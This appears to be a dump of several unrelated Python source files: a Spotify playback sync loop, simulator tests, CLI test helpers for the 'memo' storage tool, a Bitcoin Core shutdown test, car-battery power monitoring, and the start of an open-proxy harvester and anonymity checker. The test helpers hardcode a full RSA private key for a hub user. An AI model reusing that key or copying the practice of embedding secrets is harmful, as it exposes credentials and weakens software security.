self.do_update(lambda: self.spotify.remote_play(target_uri))
return True
def maybe_sync(self):
if not self.target_status or not self.local_status:
return False
if self.is_synced():
return False
else:
self.sync()
return True
"""
elif self.local_status_is_user_stop_action():
log().debug("User wants to take control.")
self.stop()
return
"""
def run(self):
log().debug("Starting.")
cv = threading.Condition()
self.local_status = None
self.target_status = None
target_getter = None
local_getter = None
try:
with cv:
while self.running:
try:
if not local_getter:
local_getter = LocalStatusGetter(
self.spotify, cv, returnon=self.spotify.EVENTS,
returnafter=3600)
local_getter.start()
if not target_getter:
target_getter = TargetStatusGetter(
cv, self.target_id, window=self.WINDOW,
rapid_poll_interval=self.RAPID_POLL_INTERVAL,
target_timeout=self.TARGET_TIMEOUT)
target_getter.start()
if local_getter.status:
self.local_status = local_getter.status
if target_getter.status:
self.target_status = target_getter.status
if self.maybe_sync():
# If we made any status changes, any old long-polls
# might return outdated data. Ignore them and start
# new polls.
log().debug("Changed local status, resetting getter.")
local_getter.stop()
local_getter = None
else:
log().debug("Waiting for changes.")
cv.wait()
except:
log().exception("While following, resetting.")
if local_getter:
local_getter.stop()
local_getter = None
if target_getter:
target_getter.stop()
target_getter = None
finally:
if local_getter:
local_getter.stop()
if target_getter:
target_getter.stop()
log().debug("Stopping.")
|
test_simulator.py
|
import multiprocessing
import random
import numpy as np
import examples.settings
import habitat_sim
def test_no_navmesh_smoke():
sim_cfg = habitat_sim.SimulatorConfiguration()
agent_config = habitat_sim.AgentConfiguration()
# No sensors as we are only testing to see if things work
# with no navmesh and the navmesh isn't used for any existing sensors
agent_config.sensor_specifications = []
sim_cfg.scene.id = "data/scene_datasets/habitat-test-scenes/van-gogh-room.glb"
# Make it try to load a navmesh that doesn't exist
sim_cfg.scene.filepaths["navmesh"] = "/tmp/dne.navmesh"
sim = habitat_sim.Simulator(habitat_sim.Configuration(sim_cfg, [agent_config]))
sim.initialize_agent(0)
random.seed(0)
for _ in range(50):
obs = sim.step(random.choice(list(agent_config.action_space.keys())))
# Can't collide with no navmesh
assert not obs["collided"]
def test_empty_scene(sim):
cfg_settings = examples.settings.default_sim_settings.copy()
# keyword "NONE" initializes a scene with no scene mesh
cfg_settings["scene"] = "NONE"
# test that depth sensor doesn't mind an empty scene
cfg_settings["depth_sensor"] = True
hab_cfg = examples.settings.make_cfg(cfg_settings)
sim.reconfigure(hab_cfg)
# test that empty frames can be rendered without a scene mesh
for _ in range(2):
obs = sim.step(random.choice(list(hab_cfg.agents[0].action_space.keys())))
def test_sim_reset(sim):
agent_config = sim.config.agents[0]
sim.initialize_agent(0)
initial_state = sim.agents[0].initial_state
# Take random steps in the environment
for _ in range(10):
action = random.choice(list(agent_config.action_space.keys()))
obs = sim.step(action)
sim.reset()
new_state = sim.agents[0].get_state()
same_position = all(initial_state.position == new_state.position)
same_rotation = np.isclose(
initial_state.rotation, new_state.rotation, rtol=1e-4
) # Numerical error can cause slight deviations
assert same_position and same_rotation
def _test_keep_agent_tgt():
sim_cfg = habitat_sim.SimulatorConfiguration()
agent_config = habitat_sim.AgentConfiguration()
sim_cfg.scene.id = "data/scene_datasets/habitat-test-scenes/van-gogh-room.glb"
agents = []
for _ in range(3):
sim = habitat_sim.Simulator(habitat_sim.Configuration(sim_cfg, [agent_config]))
agents.append(sim.get_agent(0))
sim.close()
# Make sure you can keep a reference to an agent alive without crashing
def test_keep_agent():
mp_ctx = multiprocessing.get_context("spawn")
# Run this test in a subprocess as things with OpenGL
# contexts get messy
p = mp_ctx.Process(target=_test_keep_agent_tgt)
p.start()
p.join()
assert p.exitcode == 0
|
utils.py
|
import copy
import json
import os
import pipes
import re
import shutil
import subprocess
import sys
import tempfile
import time
from datetime import timedelta
import infinit.beyond
import infinit.beyond.bottle
import infinit.beyond.couchdb
from common import *
binary = 'memo'
cr = '\r\n' if os.environ.get('EXE_EXT') else '\n'
windows = os.environ.get('OS') == 'windows' # Set in the drakefile.
def prefix_lines(prefix, s):
return re.sub('^', prefix, s, flags = re.M)
# FIXME: Duplicate with drake.
class TemporaryDirectory:
def __init__(self, path = None):
self.__dir = path
self.__del = False
def __enter__(self):
if self.__dir is None:
self.__dir = tempfile.mkdtemp()
self.__del = True
return self
def __exit__(self, *args, **kwargs):
if self.__del:
shutil.rmtree(self.__dir)
def __str__(self):
return str(self.__dir)
@property
def dir(self):
return self.__dir
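# Usage sketch (not from the original tests): the directory is created lazily on __enter__
# and removed on __exit__ only when it was auto-created here.
#   with TemporaryDirectory() as tmp:
#       path = tmp.dir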
class Memo(TemporaryDirectory):
def __init__(self,
beyond = None,
memo_root = None,
home = None,
user = None):
super().__init__(home)
self.__beyond = beyond
self.__memo_root = memo_root or ''
self.__user = user
self.__env = {}
def __enter__(self):
super().__enter__()
return self
@property
def version(self):
return self.run(['memo', '--version'])[0]
@property
def user(self):
return self.__user
@property
def env(self):
return self.__env
@property
def data_home(self):
return '%s/.local/share/infinit/memo' % self.dir
@property
def state_path(self):
return '%s/.local/state/infinit/memo' % self.dir
@property
def silos_path(self):
return '%s/silos' % self.data_home
@property
def networks_path(self):
return '%s/networks' % self.data_home
@property
def linked_networks_path(self):
return '%s/linked_networks' % self.data_home
@property
def passports_path(self):
return '%s/passports' % self.data_home
@property
def volumes_path(self):
return '%s/volumes' % self.data_home
@property
def drives_path(self):
return '%s/drives' % self.data_home
def spawn(self,
args,
input = None,
return_code = 0,
env = {},
noscript = False,
gdb = False,
valgrind = False,
binary = binary):
if isinstance(args, str):
args = args.split(' ')
if args[0][0] != '/':
if '/' not in args[0]:
args[0] = 'bin/%s' % args[0]
build_dir = os.environ.get('BUILD_DIR')
if build_dir:
args[0] = '%s/%s' % (build_dir, args[0])
args[0] += os.environ.get('EXE_EXT', '')
if gdb:
args = ['/usr/bin/gdb', '--args'] + args + ['-s']
if input is not None:
log('GDB input: %s' % json.dumps(input))
input = None
elif valgrind:
args = ['/usr/bin/valgrind'] + args
env_ = {
'MEMO_BACKTRACE': '1',
'MEMO_RDV': '',
}
if self.dir is not None:
env_['MEMO_HOME'] = self.dir
if self.__user is not None:
env_['MEMO_USER'] = self.__user
if windows:
env_['WINEDEBUG'] = os.environ.get('WINEDEBUG', '-all')
for k in ['ELLE_LOG_LEVEL', 'ELLE_LOG_FILE', 'ELLE_LOG_TIME',
'MEMO_CACHE_HOME']:
if k in os.environ:
env_[k] = os.environ[k]
if self.__beyond is not None:
env_['MEMO_BEYOND'] = self.__beyond.domain
env_.update(env)
env_.update(self.__env)
if input is not None and not noscript:
args.append('-s')
pretty = '%s %s' % (
' '.join('%s=%s' % (k, v) for k, v in sorted(env_.items())),
' '.join(pipes.quote(arg) for arg in args))
if input is not None:
if isinstance(input, list):
input = '\n'.join(map(json.dumps, input)) + cr
elif isinstance(input, dict):
input = json.dumps(input) + cr
pretty = 'echo %s | %s' % (
pipes.quote(input.strip()), pretty)
input = input.encode('utf-8')
log(pretty)
process = subprocess.Popen(
args,
env = env_,
stdin = subprocess.PIPE if not gdb else None,
stdout = subprocess.PIPE if not gdb else None,
stderr = subprocess.PIPE if not gdb else None,
)
self.process = process
if input is not None:
process.stdin.write(input)
process.pretty = pretty
return process
def run(self,
args,
input = None,
return_code = 0,
env = {},
gdb = False,
valgrind = False,
timeout = 600,
noscript = False,
binary = binary,
kill = False):
'''Return (stdout, stderr).'''
args = [binary] + args
out = None
err = None
try:
process = self.spawn(
args, input, return_code, env,
gdb = gdb, valgrind = valgrind,
noscript = noscript)
out, err = process.communicate(timeout = timeout)
process.wait()
except (subprocess.TimeoutExpired, KeyboardInterrupt):
process.kill()
try:
out, err = process.communicate(timeout = 15)
except ValueError as e:
log("Got exception while trying to kill process:", e)
# Python bug, throws ValueError. But in that case blocking
# `read` is fine.
# out = process.stdout.read()
# err = process.stderr.read()
log(prefix_lines('STDOUT: ', out.decode('utf-8')))
log(prefix_lines('STDERR: ', err.decode('utf-8')))
if kill:
return out, err
raise
if out is not None:
out = out.decode('utf-8')
if err is not None:
err = err.decode('utf-8')
# log('STDOUT: %s' % out)
# log('STDERR: %s' % err)
if process.returncode != return_code:
raise Exception(
'command failed with code %s: %s\nstdout: %s\nstderr: %s' % \
(process.returncode, process.pretty, out, err))
self.last_out = out
self.last_err = err
return out, err
def run_json(self, args, gdb = False, valgrind = False,
*largs, **kwargs):
out, err = self.run(args.split(' ') if isinstance(args, str) else args,
gdb = gdb, valgrind = valgrind,
*largs, **kwargs)
try:
res = [json.loads(l) for l in out.split(cr) if l]
if len(res) == 0:
return None
elif len(res) == 1:
return res[0]
else:
return res
except Exception as e:
raise Exception('invalid JSON: %r' % out)
def throws(f, contains = None):
try:
f()
assert False
except Exception as e:
if contains is not None:
assertIn(contains, str(e))
pass
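# Example (generic Python, not tied to memo): throws(lambda: int('x'), contains='invalid literal')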
import bottle
class Beyond():
def __init__(self, beyond_args = {}, disable_authentication = False,
bottle_args = {}):
super().__init__()
self.__beyond_args = beyond_args
self.__advance = timedelta()
self.__server = bottle.WSGIRefServer(port = 0)
self.__app = None
self.__beyond = None
self.__couchdb = infinit.beyond.couchdb.CouchDB()
self.__datastore = None
self.__gcs = FakeGCS()
self.__hub_delegate_user = None
self.__disable_authentication = disable_authentication
self.__bottle_args = bottle_args
def __enter__(self):
couchdb = self.__couchdb.__enter__()
self.__datastore = \
infinit.beyond.couchdb.CouchDBDatastore(couchdb)
def run():
args = {
'dropbox_app_key': 'db_key',
'dropbox_app_secret': 'db_secret',
'google_app_key': 'google_key',
'google_app_secret': 'google_secret',
'gcs_app_key': 'google_key',
'gcs_app_secret': 'google_secret',
}
args.update(self.__beyond_args)
self.__beyond = infinit.beyond.Beyond(
datastore = self.__datastore,
**args
)
setattr(self.__beyond, '_Beyond__now', self.now)
bargs = {
'beyond': self.__beyond,
'gcs': self.__gcs,
}
bargs.update(self.__bottle_args)
self.__app = infinit.beyond.bottle.Bottle(**bargs)
if self.__disable_authentication:
self.__app.authenticate = lambda x: None
self.emailer = Emailer()
bottle.run(app = self.__app,
quiet = True,
server = self.__server)
import threading
from functools import partial
thread = threading.Thread(target = run)
thread.daemon = True
thread.start()
while self.__server.port == 0 and thread.is_alive():
import time
time.sleep(.1)
if not thread.is_alive():
raise Exception("Server is already dead")
# Register hub user.
import requests
self.__hub_delegate_user = {
'email': 'hub@infini.io',
'name': self.__beyond.delegate_user,
'private_key': {
'rsa': 'MIIEowIBAAKCAQEAspp/p8TnTRLao+KeBnz1tvlAC3UKAjXOmfyVJw0Lpe29mxbnAq3uUD8Um5t5jHwYX3P8r+FOL83Yt41Y+dkbWM3hQoYA2Et4ypDRUQ3k+ku6kNHkRhRY9nmAhHM9L8C5VlcYQG197mN/+h9sS1EarYV/BawY4VIcEj7z65Xv6Z0YYvEgjLXjlDmUPEg1wZOA2mcx8RcTyhvok5sl7WWO0J00sZSFqTHCFpZFiBY49cCax2+EuXMdlqlcnKZvWtQVQc5JR4T1vccx+TJUM3JeZpKNAVCI9von2CxXaqCaDwN3D9B6V7cgFW8j+PSSQFjri2341/zkK37IkicJAi/vqQIDAQABAoIBACdc/b2QHBpUiXONQp7Tc6Q8Eu1zgh0ylrJBhO3yZhrP5vYDei6Q/vEYtgYFoihgQU7oVUy+L2lByP3LXUzTmL9dwMPUnOMO3zRl7nwav9iaUCgS2mjHm0PXS4fljhq0MyTgVSv99b9QlqgdvNRsr6CGx5QMdf9TBXTQAxptFU87Ph5O8KrX8wgmFcWqSNEPh6yT9fhl9E0KxkuWh0x2zf8NpsUrBP1CQRhJsxtraTLfKTy8OowVYcx9mHAj4MHg2LVqjRn/QXN4IPdyU5wHMKk95Tf8sLByn0lAfiYM0SMUjy428ueY01WTl0+sN4lSJkHJ7Oz8fajMWeIQhm+wmrECgYEA1/nGE5XndPH82idwXcauGIWTW/jIJAI2VoqHHl7CW0Jw4Q1AeyyJB+3Tu+lUjNwTHDgq0fEjXyup1Hv2diPZecoiw/UWDqMHGawN9JXz/V6ro56eQN3jAuwg15Xig36CtEw8Ay9NdnD7pK/9h8vGsmtqwH3BR0qFR5PX33PE4VMCgYEA07O6/A9BCQpKYB7ovlPu9xxm5Y907HdyqYfSrz2RXP7m0VvXp18cB+KqqCfkipj/ckv2qAA/ng6P/43b+6o5li5g0wM83GwJ0UXIFeoClcTKXlP8x531eVwP58nFsDHUKd3F7hLdmBbAizVV6WQqKFL7g/H+K9mjCTW0vskQn5MCgYAjo/1S+BblDpX6bi212/aY51olAE4O2yqaZ2va0Cpkovc7vFMawIOwgkfBp8SjJiIlMwOl95QtvWfeP8KxRkM6POg1zDkimzatvt3iseg8tKXAb4mQDM3Miqj0yrBBoNvy4u24XNL8q7JrP/unsDIO+Xj5YQdHO335DOW/4zvnLwKBgQCD+Ch59LBgCFAw91OzQfNXjBcAx5rlxdhuokLOBx1U0XnlzND0fy+kIsKrrKKlW5byEzShqfX+e6l8b1xQ196qJiMpp30LEzZThKKkNoqB/nkAsG6FqYxaqO8pWPipS4asypkWPiBxLM2+efMiWNSG6qPrrrD5eORPW3Fe9UwtjQKBgFHLxxn0SX34IBTdQrNFmP4oUK2CW7s86S7XvfzPxgbTj1nAhooJBfjp6OuKPdKlvGKueEwJ+w4ZMPPU8cnXQpSLU2Amifz5LU0vwphAd+Lw2rK878ku1PZSHJPddqbKcpr/swOm0frRWt8jY8RKzADpqmVRZebUleuDmJZ5d25H'
},
'public_key': {
'rsa': 'MIIBCgKCAQEAspp/p8TnTRLao+KeBnz1tvlAC3UKAjXOmfyVJw0Lpe29mxbnAq3uUD8Um5t5jHwYX3P8r+FOL83Yt41Y+dkbWM3hQoYA2Et4ypDRUQ3k+ku6kNHkRhRY9nmAhHM9L8C5VlcYQG197mN/+h9sS1EarYV/BawY4VIcEj7z65Xv6Z0YYvEgjLXjlDmUPEg1wZOA2mcx8RcTyhvok5sl7WWO0J00sZSFqTHCFpZFiBY49cCax2+EuXMdlqlcnKZvWtQVQc5JR4T1vccx+TJUM3JeZpKNAVCI9von2CxXaqCaDwN3D9B6V7cgFW8j+PSSQFjri2341/zkK37IkicJAi/vqQIDAQAB'
}
}
kwargs = {
'headers': {'Content-Type': 'application/json'},
'data': json.dumps(self.hub_delegate_user)
}
res = requests.request(
url = '%s/users/%s' % (self.domain, self.hub_delegate_user['name']),
method = 'PUT',
**kwargs)
res.raise_for_status()
return self
def __exit__(self, *args, **kwargs):
self.__couchdb.__exit__()
@property
def emailer(self):
return self.__beyond.emailer
@emailer.setter
def emailer(self, emailer):
setattr(self.__beyond, '_Beyond__emailer', emailer)
@property
def hub_delegate_user(self):
return self.__hub_delegate_user
@property
def domain(self):
return "http://localhost:%s" % self.__server.port
# XXX: Duplicated from beyond/tests/utils.py, could be merged someday.
def now(self):
import datetime
return datetime.datetime.utcnow() + self.__advance
def advance(self, seconds, set = False):
if set:
self.__advance = timedelta(seconds = seconds)
else:
self.__advance += timedelta(seconds = seconds)
class User():
def __init__(self, name, memo):
self.name = name
self.storage = '%s/%s-storage' % (name, name)
self.network = '%s/%s-network' % (name, name)
self.volume = '%s/%s-volume' % (name, name)
self.mountpoint = '%s/%s-mountpoint' % (memo.dir, name)
self.drive = '%s/%s-drive' % (name, name)
os.mkdir(self.mountpoint)
self.memo = memo
def run(self, cli, **kargs):
return self.memo.run(
cli.split(' ') if isinstance(cli, str) else cli,
env = { 'MEMO_USER': self.name }, **kargs)
def run_json(self, *args, **kwargs):
if 'env' in kwargs:
kwargs['env']['MEMO_USER'] = self.name
else:
kwargs['env'] = { 'MEMO_USER': self.name }
return self.memo.run_json(*args, **kwargs)
def run_split(self, args, **kargs):
return self.memo.run(args, env = { 'MEMO_USER': self.name }, **kargs)
def async(self, cli, **kargs):
import threading
from functools import partial
thread = threading.Thread(
target = partial(self.run, cli = cli, **kargs))
thread.daemon = True
thread.start()
return thread
def fail(self, cli, **kargs):
self.memo.run(cli.split(' '), return_code = 1, **kargs)
class SharedLogicCLITests():
def __init__(self, entity):
self.__entity = entity
def run(self):
entity = self.__entity
# Creating and deleting entity.
with Memo() as bob:
e_name = random_sequence()
bob.run(['user', 'create', 'bob'])
bob.run(['network', 'create', 'network', '--as', 'bob'])
bob.run([entity, 'create', e_name, '-N', 'network',
'--as', 'bob'])
bob.run([entity, 'export', 'bob/%s' % e_name, '--as', 'bob'])
bob.run([entity, 'delete', e_name, '--as', 'bob'])
# Push to the hub.
with Beyond() as beyond, \
Memo(beyond = beyond) as bob, Memo(beyond) as alice:
e_name = random_sequence()
bob.run(['user', 'signup', 'bob', '--email', 'bob@infinit.sh'])
bob.run(['network', 'create', 'network', '--as', 'bob',
'--push'])
bob.run([entity, 'create', e_name, '-N', 'network',
'--description', 'something', '--as', 'bob', '--push'])
try:
bob.run([entity, '--push', '--name', e_name])
unreachable()
except Exception as e:
pass
alice.run(['user', 'signup', 'alice',
'--email', 'a@infinit.sh'])
alice.run([entity, 'fetch', 'bob/%s' % e_name,
'--as', 'alice'])
e = alice.run_json([entity, 'export', 'bob/%s' % e_name,
'--as', 'alice'])
assertEq(e['description'], 'something')
# Pull and delete.
with Beyond() as beyond, Memo(beyond = beyond) as bob:
e_name = random_sequence()
e_name2 = e_name
while e_name2 == e_name:
e_name2 = random_sequence()
bob.run(['user', 'signup', 'bob', '--email', 'b@infinit.sh'])
bob.run(['network', 'create', '--as', 'bob', 'n', '--push'])
# Local and Beyond.
bob.run([entity, 'create', '--as', 'bob', e_name,
'-N', 'n', '--push'])
assertEq(len(bob.run_json([entity, 'list', '-s'])), 1)
bob.run([entity, 'delete', '--as', 'bob', e_name, '--pull'])
assertEq(len(bob.run_json([entity, 'list', '-s'])), 0)
bob.run([entity, 'fetch', '--as', 'bob', e_name],
return_code = 1)
# Local only.
bob.run([entity, 'create', '--as', 'bob', e_name2, '-N', 'n'])
assertEq(len(bob.run_json([entity, 'list', '-s'])), 1)
bob.run([entity, 'delete', '--as', 'bob', e_name2, '--pull'])
assertEq(len(bob.run_json([entity, 'list', '-s'])), 0)
class KeyValueStoreInfrastructure():
def __init__(self, usr, uname = 'bob', kvname = 'kv'):
self.__usr = usr
self.__uname = uname
self.__kvname = kvname
self.__proc = None
self.__stub = None
self.__endpoint = None
@property
def usr(self):
return self.__usr
@property
def uname(self):
return self.__uname
@property
def kvname(self):
return self.__kvname
@property
def stub(self):
return self.__stub
@property
def endpoint(self):
return self.__endpoint
def __enter__(self):
self.usr.run(['user', 'create', self.uname])
self.usr.run(['silo', 'create', 'filesystem', 's'])
self.usr.run(['network', 'create', 'n', '-S', 's',
'--as', self.uname])
self.usr.run(['kvs', 'create', self.kvname,
'-N', 'n', '--as', self.uname])
port_file = '%s/port' % self.usr.dir
self.__proc = self.usr.spawn(
['memo', 'kvs', 'run', self.kvname, '--as', self.uname,
'--allow-root-creation',
'--grpc', '127.0.0.1:0', '--grpc-port-file', port_file])
def comm(self):
self.out, self.err = self.__proc.communicate()
import threading
self.__comm = threading.Thread(target=comm, args=[self])
self.__comm.start()
while not os.path.exists(port_file):
time.sleep(0.1)
with open(port_file, 'r') as f:
self.__endpoint = '127.0.0.1:{}'.format(f.readline().strip())
import grpc
import memo_kvs_pb2_grpc
channel = grpc.insecure_channel(self.__endpoint)
self.__stub = memo_kvs_pb2_grpc.KeyValueStoreStub(channel)
return self
def __exit__(self, *args, **kwargs):
if self.__proc:
self.__proc.terminate()
self.__comm.join()
if not windows:
try:
# SIGTERM is not caught on windows. Might be wine related.
assertEq(0, self.__proc.wait())
except:
log(prefix_lines('STDOUT: ', self.out.decode('utf-8')))
log(prefix_lines('STDERR: ', self.err.decode('utf-8')))
raise
def client(self):
import grpc
import memo_kvs_pb2_grpc
channel = grpc.insecure_channel(self.__endpoint)
return memo_kvs_pb2_grpc.KeyValueStoreStub(channel)
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test axed shutdown."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
Thread(target=test_long_call, args=(node,)).start()
# wait 1 second to ensure event loop waits for current connections to close
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
power_monitoring.py
|
import random
import threading
import time
from statistics import mean
from cereal import log
from common.params import Params, put_nonblocking
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE
from selfdrive.swaglog import cloudlog
CAR_VOLTAGE_LOW_PASS_K = 0.091 # LPF gain for 5s tau (dt/tau / (dt/tau + 1))
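# Sanity check of the gain (assuming the ~0.5 s update period of the calling loop):
# dt/tau = 0.5/5 = 0.1, and 0.1 / (0.1 + 1) = 0.0909... ~= 0.091.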
# A C2 uses about 1W while idling, and 30h seems like a good shutoff for most cars
# While driving, a battery charges completely in about 30-60 minutes
CAR_BATTERY_CAPACITY_uWh = 30e6
CAR_CHARGING_RATE_W = 45
VBATT_PAUSE_CHARGING = 11.0 # Lower limit on the LPF car battery voltage
VBATT_INSTANT_PAUSE_CHARGING = 7.0 # Lower limit on the instant car battery voltage measurements to avoid triggering on instant power loss
MAX_TIME_OFFROAD_S = 30*3600
MIN_ON_TIME_S = 3600
OPKR_SHUTDOWN_TIME = 3 # sec
class PowerMonitoring:
def __init__(self):
self.params = Params()
self.last_measurement_time = None # Used for integration delta
self.last_save_time = 0 # Used for saving current value in a param
self.power_used_uWh = 0 # Integrated power usage in uWh since going into offroad
self.next_pulsed_measurement_time = None
self.car_voltage_mV = 12e3 # Low-passed version of peripheralState voltage
self.car_voltage_instant_mV = 12e3 # Last value of peripheralState voltage
self.integration_lock = threading.Lock()
self.ts_last_charging_ctrl = None
self.power_on2_time = 0
car_battery_capacity_uWh = self.params.get("CarBatteryCapacity")
if car_battery_capacity_uWh is None:
car_battery_capacity_uWh = 0
# Reset capacity if it's low
self.car_battery_capacity_uWh = max((CAR_BATTERY_CAPACITY_uWh / 10), int(car_battery_capacity_uWh))
# Calculation tick
def calculate(self, peripheralState, ignition):
try:
now = sec_since_boot()
# If peripheralState is None, we're probably not in a car, so we don't care
if peripheralState is None or peripheralState.pandaType == log.PandaState.PandaType.unknown:
with self.integration_lock:
self.last_measurement_time = None
self.next_pulsed_measurement_time = None
self.power_used_uWh = 0
return
# Low-pass battery voltage
self.car_voltage_instant_mV = peripheralState.voltage
self.car_voltage_mV = ((peripheralState.voltage * CAR_VOLTAGE_LOW_PASS_K) + (self.car_voltage_mV * (1 - CAR_VOLTAGE_LOW_PASS_K)))
# Cap the car battery power and save it in a param every 10-ish seconds
self.car_battery_capacity_uWh = max(self.car_battery_capacity_uWh, 0)
self.car_battery_capacity_uWh = min(self.car_battery_capacity_uWh, CAR_BATTERY_CAPACITY_uWh)
if now - self.last_save_time >= 10:
put_nonblocking("CarBatteryCapacity", str(int(self.car_battery_capacity_uWh)))
self.last_save_time = now
# First measurement, set integration time
with self.integration_lock:
if self.last_measurement_time is None:
self.last_measurement_time = now
return
if ignition:
# If there is ignition, we integrate the charging rate of the car
with self.integration_lock:
self.power_used_uWh = 0
integration_time_h = (now - self.last_measurement_time) / 3600
if integration_time_h < 0:
raise ValueError(f"Negative integration time: {integration_time_h}h")
self.car_battery_capacity_uWh += (CAR_CHARGING_RATE_W * 1e6 * integration_time_h)
self.last_measurement_time = now
else:
# No ignition, we integrate the offroad power used by the device
is_uno = peripheralState.pandaType == log.PandaState.PandaType.uno
# Get current power draw somehow
current_power = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power is not None:
pass
elif HARDWARE.get_battery_status() == 'Discharging':
# If the battery is discharging, we can use this measurement
# On C2: this is low by about 10-15%, probably mostly due to UNO draw not being factored in
current_power = ((HARDWARE.get_battery_voltage() / 1000000) * (HARDWARE.get_battery_current() / 1000000))
elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now):
# TODO: Figure out why this is off by a factor of 3/4???
FUDGE_FACTOR = 1.33
# Turn off charging for about 10 sec in a thread that does not get killed on SIGINT, and perform measurement here to avoid blocking thermal
def perform_pulse_measurement(now):
try:
HARDWARE.set_battery_charging(False)
time.sleep(5)
# Measure for a few sec to get a good average
voltages = []
currents = []
for _ in range(6):
voltages.append(HARDWARE.get_battery_voltage())
currents.append(HARDWARE.get_battery_current())
time.sleep(1)
current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000))
self._perform_integration(now, current_power * FUDGE_FACTOR)
# Enable charging again
HARDWARE.set_battery_charging(True)
except Exception:
cloudlog.exception("Pulsed power measurement failed")
# Start pulsed measurement and return
threading.Thread(target=perform_pulse_measurement, args=(now,)).start()
self.next_pulsed_measurement_time = None
return
elif self.next_pulsed_measurement_time is None and not is_uno:
# On a charging EON with black panda, or drawing more than 400mA out of a white/grey one
# Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is
# We shouldn't do this very often, so make sure it has been some long-ish random time interval
self.next_pulsed_measurement_time = now + random.randint(120, 180)
return
else:
# Do nothing
return
# Do the integration
self._perform_integration(now, current_power)
except Exception:
cloudlog.exception("Power monitoring calculation failed")
def _perform_integration(self, t, current_power):
with self.integration_lock:
try:
if self.last_measurement_time:
integration_time_h = (t - self.last_measurement_time) / 3600
power_used = (current_power * 1000000) * integration_time_h
if power_used < 0:
raise ValueError(f"Negative power used! Integration time: {integration_time_h} h Current Power: {power_used} uWh")
self.power_used_uWh += power_used
self.car_battery_capacity_uWh -= power_used
self.last_measurement_time = t
except Exception:
cloudlog.exception("Integration failed")
# Get the power usage
def get_power_used(self):
return int(self.power_used_uWh)
def get_car_battery_capacity(self):
return int(self.car_battery_capacity_uWh)
# See if we need to disable charging
def should_disable_charging(self, ignition, in_car, offroad_timestamp):
if offroad_timestamp is None:
return False
now = sec_since_boot()
disable_charging = False
disable_charging |= (now - offroad_timestamp) > MAX_TIME_OFFROAD_S
disable_charging |= (self.car_voltage_mV < (VBATT_PAUSE_CHARGING * 1e3)) and (self.car_voltage_instant_mV > (VBATT_INSTANT_PAUSE_CHARGING * 1e3))
disable_charging |= (self.car_battery_capacity_uWh <= 0)
disable_charging &= not ignition
disable_charging &= (not self.params.get_bool("DisablePowerDown"))
disable_charging &= in_car
disable_charging |= self.params.get_bool("ForcePowerDown")
return disable_charging
# See if we need to shutdown
def should_shutdown(self, peripheralState, ignition, in_car, offroad_timestamp, started_seen):
if offroad_timestamp is None:
return False
now = sec_since_boot()
panda_charging = (peripheralState.usbPowerMode != log.PeripheralState.UsbPowerMode.client)
BATT_PERC_OFF = 60
should_shutdown = False
# Wait until we have shut down charging before powering down
should_shutdown |= (not panda_charging and self.should_disable_charging(ignition, in_car, offroad_timestamp))
should_shutdown |= ((HARDWARE.get_battery_capacity() < BATT_PERC_OFF) and (not HARDWARE.get_battery_charging()) and ((now - offroad_timestamp) > 5))
should_shutdown &= started_seen or (now > MIN_ON_TIME_S)
return should_shutdown
def charging_ctrl(self, msg, ts, to_discharge, to_charge ):
if self.ts_last_charging_ctrl is None or (ts - self.ts_last_charging_ctrl) >= 300.:
battery_charging = HARDWARE.get_battery_charging()
if self.ts_last_charging_ctrl:
if msg.deviceState.batteryPercent >= to_discharge and battery_charging:
HARDWARE.set_battery_charging(False)
elif msg.deviceState.batteryPercent <= to_charge and not battery_charging:
HARDWARE.set_battery_charging(True)
self.ts_last_charging_ctrl = ts
|
getproxy.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import, division, \
print_function
import os
import json
import time
import copy
# import signal
import logging
import requests
import geoip2.database
from threading import Thread
from queue import Queue, Empty
# from .utils import signal_name
from .utils import load_object
logger = logging.getLogger(__name__)
class GetProxy(object):
base_dir = os.path.dirname(os.path.realpath(__file__))
def __init__(self, input_proxies=[], only_https=False,
max_response_time=None, only_anonimous=False,
n_threads=200):
self.plugins = []
self.web_proxies = []
self.valid_proxies = []
self.input_proxies = input_proxies
self.proxies_hash = {}
self.only_https = only_https
self.max_response_time = max_response_time
self.only_anonimous = only_anonimous
self.origin_ip = None
self.geoip_reader = None
self.n_threads = n_threads
def _collect_result(self):
for plugin in self.plugins:
if not plugin.result:
continue
self.web_proxies.extend(plugin.result)
def _validate_proxy(self, proxy, scheme='https'):
country = proxy.get('country')
host = proxy.get('host')
port = proxy.get('port')
proxy_hash = '%s://%s:%s' % (scheme, host, port)
if proxy_hash in self.proxies_hash:
return
self.proxies_hash[proxy_hash] = True
request_proxies = {
scheme: "%s:%s" % (host, port)
}
request_begin = time.time()
try:
response_json = requests.get(
"%s://httpbin.org/get?show_env=1&cur=%s" % (scheme,
request_begin),
proxies=request_proxies,
timeout=5
).json()
except:
return
request_end = time.time()
response_time = round(request_end - request_begin, 2)
if self.max_response_time:
if response_time > self.max_response_time:
return
if str(request_begin) != response_json.get('args', {}).get('cur', ''):
return
anonymity = self._check_proxy_anonymity(response_json)
if self.only_anonimous and anonymity == 'transparent':
return
try:
country = country or \
self.geoip_reader.country(host).country.iso_code
except Exception:
country = "UNK"
export_address = self._check_export_address(response_json)
return {
"type": scheme,
"host": host,
"export_address": export_address,
"port": port,
"anonymity": anonymity,
"country": country,
"response_time": response_time,
"from": proxy.get('from')
}
def validate_proxy(self, queue, valid_proxies):
while True:
try:
proxy, scheme = queue.get(timeout=10)
logger.debug("validating proxy %s", proxy)
try:
res = self._validate_proxy(proxy, scheme)
except Exception:
res = None
if res:
valid_proxies.append(res)
queue.task_done()
except Empty:
return
def _validate_proxy_list(self, proxies, timeout=300):
